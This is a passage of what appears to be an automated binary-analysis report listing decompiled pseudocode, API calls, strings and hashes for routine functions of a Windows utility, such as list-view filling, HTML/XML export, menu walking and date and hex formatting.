				_t87 = _a4;
				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
				_v8 = _t52;
				SendMessageW(_t52, 0x1009, 0, 0);
				SendMessageW(_v8, 0x1036, 0, 0x26);
				do {
				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v8);
				_t78 = 6;
				E00402842(0x40f454, _t78);
				_t58 =  *((intOrPtr*)(_t87 + 0x40));
				_t79 =  *((intOrPtr*)(_t58 + 4));
				_t77 =  *_t58;
				_t93 = _t92 + 0x10;
				_v24 = _t79;
				_v16 = 0;
				if(_t79 <= 0) {
					L10:
					_t59 = 2;
					E004027D3(_t59, _v8, 0, _t59);
					return SetFocus(_v8);
				} else {
					goto L3;
				}
				do {
					L3:
					_v12 = 0;
					_v20 = 0;
					do {
						_t89 = _v12 << 2;
						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
							_v584 = 0;
							memset( &_v582, 0, 0x1fe);
							_t93 = _t93 + 0xc;
							_v60 =  &_v584;
							_v72 = 4;
							_v56 = 0xff;
							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
								_push(0);
								_push(_v12);
								_push(0);
								_push(0);
								_push(0);
								_push(_v8);
								_t82 = 5;
								_t71 = E004028C5( &_v584, _t82);
								_t90 = _t89 + _t77;
								_t83 =  *_t90;
								_v28 =  *_t90;
								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
								_t93 = _t93 + 0x24;
								if(_v28 == 0) {
									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
								}
							}
						}
						_v12 = _v12 + 1;
						_t63 = _v24;
						_v20 = _v20 + 0x14;
					} while (_v12 < _t63);
					_v16 = _v16 + 1;
				} while (_v16 < _t63);
				goto L10;
			}

0x004031ca
0x004031d5
0x004031eb
0x004031ee
0x004031fb
0x004031fd
0x00403209
0x0040320d
0x00403212
0x00403213
0x00403214
0x0040321e
0x0040321f
0x00403224
0x00403227
0x0040322a
0x0040322c
0x00403231
0x00403234
0x00403237
0x00403313
0x00403315
0x0040331b
0x00403330
0x00000000
0x00000000
0x00000000
0x0040323d
0x0040323d
0x0040323d
0x00403240
0x00403243
0x00403246
0x00403251
0x00403264
0x0040326b
0x00403279
0x00403282
0x0040328c
0x00403299
0x004032a8
0x004032aa
0x004032ab
0x004032b4
0x004032b5
0x004032b6
0x004032b7
0x004032bc
0x004032bd
0x004032c2
0x004032c4
0x004032ce
0x004032d6
0x004032db
0x004032e1
0x004032f1
0x004032f1
0x004032e1
0x004032a8
0x004032f4
0x004032f7
0x004032fa
0x004032fe
0x00403307
0x0040330a
0x00000000

APIs

GetDlgItem.USER32 ref: 004031D5
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
memset.MSVCRT ref: 0040326B
SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
SetFocus.USER32(?), ref: 00403326

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408AFA, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t94;
				intOrPtr* _t97;
				void* _t99;
				void* _t101;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t101 = _t99 + 0x18;
				asm("movsw");
				E00408857(__ebx, 0, _a4, L"<tr>");
				_t94 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t97 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
						E0040DBA9(_v28,  &_v108);
						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
						_t67 =  *(_t73 + 0x6c);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
							_pop(0);
						}
						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
						_push( *((intOrPtr*)(_t73 + 0x70)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x68)));
						L0040DFD6();
						_t101 = _t101 + 0x1c;
						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
						_t94 = _t94 + 1;
					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
				}
				return E00408857(_t73, 0, _a4, L"\r\n");
			}

0x00408afa
0x00408b07
0x00408b08
0x00408b15
0x00408b20
0x00408b20
0x00408b2c
0x00408b2e
0x00408b33
0x00408b38
0x00408b3e
0x00408b41
0x00408b47
0x00408b52
0x00408b58
0x00408b5a
0x00408b5a
0x00408b5d
0x00408b60
0x00408b64
0x00408b68
0x00408b6c
0x00408b76
0x00408b7f
0x00408b89
0x00408b9f
0x00408baf
0x00408bb2
0x00408bb5
0x00408bbb
0x00408bc9
0x00408bcf
0x00408bcf
0x00408bd9
0x00408bde
0x00408be4
0x00408be5
0x00408be8
0x00408bed
0x00408bf0
0x00408bf5
0x00408c00
0x00408c05
0x00408c06
0x00408b3e
0x00408c21

APIs

wcscat.MSVCRT ref: 00408BC9
_snwprintf.MSVCRT ref: 00408BF0

Strings

<td bgcolor=#%s>%s, xrefs: 00408B18
<td bgcolor=#%s nowrap>%s, xrefs: 00408B0A
 , xrefs: 00408BC3
<tr>, xrefs: 00408B22

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00406E97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040E340(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E00406E97(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x412c34 =  *0x412c34 + 1;
							_t32 =  *0x412c34; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406E5E(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x00406e97
0x00406e9a
0x00406ea2
0x00406ead
0x00406eb3
0x00406eb7
0x00406ebb
0x00406f81
0x00406f87
0x00000000
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ecc
0x00406ed1
0x00406ed8
0x00406ee7
0x00406eef
0x00406ef7
0x00406eff
0x00406f03
0x00406f08
0x00406f10
0x00000000
0x00000000
0x00406f17
0x00406f62
0x00406f62
0x00406f66
0x00406f68
0x00406f69
0x00406f6d
0x00406f70
0x00406f75
0x00406f75
0x00000000
0x00406f66
0x00406f20
0x00406f29
0x00406f2b
0x00406f2b
0x00406f32
0x00406f36
0x00406f3b
0x00406f45
0x00406f4b
0x00406f50
0x00406f50
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3b
0x00406f5b
0x00406f61
0x00000000
0x00406f78
0x00406f78
0x00406f79
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406EAD
memset.MSVCRT ref: 00406ECC
GetMenuItemInfoW.USER32 ref: 00406F08
wcschr.MSVCRT ref: 00406F20

Strings

0, xrefs: 00406EE7
6, xrefs: 00406EEF

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004019D2, Relevance: 10.6, APIs: 7, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004019D2(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t26;
				int _t30;
				void* _t33;
				int _t36;
				int _t37;
				int _t40;
				int _t49;

				_t33 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
					return _t26;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t40 = GetSystemMetrics(0x4c);
					_t30 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t40 = 0;
						_t30 = 0;
					} else {
						_v8 = _v8 + _t40;
						_v12 = _v12 + _t30;
					}
					_t49 = _v20 - _v28;
					if(_t49 > 0x14) {
						_t37 = _v24;
						_t36 = _v16 - _t37;
						if(_t36 > 0x14 && _v20 > _t40 + 5) {
							_t30 = _t30 + 0xfffffff6;
							if(_t37 >= _t30) {
								_t30 = _v28;
								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
								}
							}
						}
					}
					return _t30;
				}
			}

0x004019d2
0x004019df
0x00401a94
0x004019e5
0x004019f0
0x004019f1
0x004019f2
0x004019f3
0x00401a00
0x00401a07
0x00401a0e
0x00401a10
0x00401a17
0x00401a2b
0x00401a30
0x00401a33
0x00401a35
0x00401a1e
0x00401a1e
0x00401a21
0x00401a21
0x00401a3a
0x00401a40
0x00401a45
0x00401a48
0x00401a4d
0x00401a57
0x00401a5c
0x00401a5e
0x00401a67
0x00401a8b
0x00401a8b
0x00401a67
0x00401a5c
0x00401a4d
0x00000000
0x00401a92

APIs

GetSystemMetrics.USER32 ref: 004019FC
GetSystemMetrics.USER32 ref: 00401A03
GetSystemMetrics.USER32 ref: 00401A0A
GetSystemMetrics.USER32 ref: 00401A10
GetSystemMetrics.USER32 ref: 00401A27
GetSystemMetrics.USER32 ref: 00401A2E
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94

Uniqueness

Uniqueness Score: -1.00%

Function 00405C17, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C17(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v24;
				long _v280;
				long _v536;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
						wcscpy(_a4,  &_v280);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v536);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40f454);
				}
				return _a4;
			}

0x00405c17
0x00405c28
0x00405c3b
0x00000000
0x00405c45
0x00405c5f
0x00405c74
0x00405c84
0x00405c91
0x00405ca0
0x00405ca5
0x00405caa
0x00405caa
0x00405cb2
0x00405cb8
0x00405cc0

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
wcscpy.MSVCRT ref: 00405C84
wcscat.MSVCRT ref: 00405C91
wcscat.MSVCRT ref: 00405CA0
wcscpy.MSVCRT ref: 00405CB2

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040DFD6();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00405d33
0x00405d3c
0x00405d53
0x00405d58
0x00405d5c
0x00405d5f
0x00405d61
0x00405d68
0x00405d69
0x00405d74
0x00405d79
0x00405d7a
0x00405d7f
0x00405d84
0x00405d8c
0x00405d92
0x00405d97
0x00405d9b
0x00405da1
0x00405da9
0x00405daf
0x00405da1
0x00405db8
0x00405dbd
0x00405dc5
0x00405dcc

APIs

memset.MSVCRT ref: 00405D53
_snwprintf.MSVCRT ref: 00405D7A
wcscat.MSVCRT ref: 00405D8C
wcscat.MSVCRT ref: 00405DA9
wcscat.MSVCRT ref: 00405DB8

Strings

%2.2X, xrefs: 00405D69

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88

Uniqueness

Uniqueness Score: -1.00%

Function 004093B3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t27 = __ecx;
				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00408857(_t16, _t27);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E004086F5(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t29, _t29, _a4,  &_v1028);
			}

0x004093b3
0x004093cf
0x004093d1
0x004093d8
0x004093e6
0x004093ed
0x004093f8
0x004093fa
0x00409403
0x004093fc
0x004093fc
0x004093fc
0x0040940b
0x00409414
0x00409418
0x0040941e
0x00409425
0x00409426
0x00409431
0x00409436
0x00409437
0x00409454

APIs

memset.MSVCRT ref: 004093D8
memset.MSVCRT ref: 004093ED
_snwprintf.MSVCRT ref: 00409437

Strings

<%s>, xrefs: 00409426
<?xml version="1.0" ?>, xrefs: 004093FC
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDA7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E004055FF(0xff,  &_v1036, _v8);
				E004056C9(_t34, __esi);
				return 1;
			}

0x0040ddbc
0x0040ddcb
0x0040dddc
0x0040ddeb
0x0040de0c
0x00000000
0x0040de30
0x0040de17
0x0040de1d
0x0040de25
0x00000000

APIs

wcscpy.MSVCRT ref: 0040DDBC
wcscat.MSVCRT ref: 0040DDCB
wcscat.MSVCRT ref: 0040DDDC
wcscat.MSVCRT ref: 0040DDEB
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05

Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C

Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5

Strings

\StringFileInfo\, xrefs: 0040DDB6

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00406CEB
wcscpy.MSVCRT ref: 00406D0E

Strings

menu_%d, xrefs: 00406CCF
general, xrefs: 00406D04
dialog_%d, xrefs: 00406CDF
strings, xrefs: 00406CF9

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBD8, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
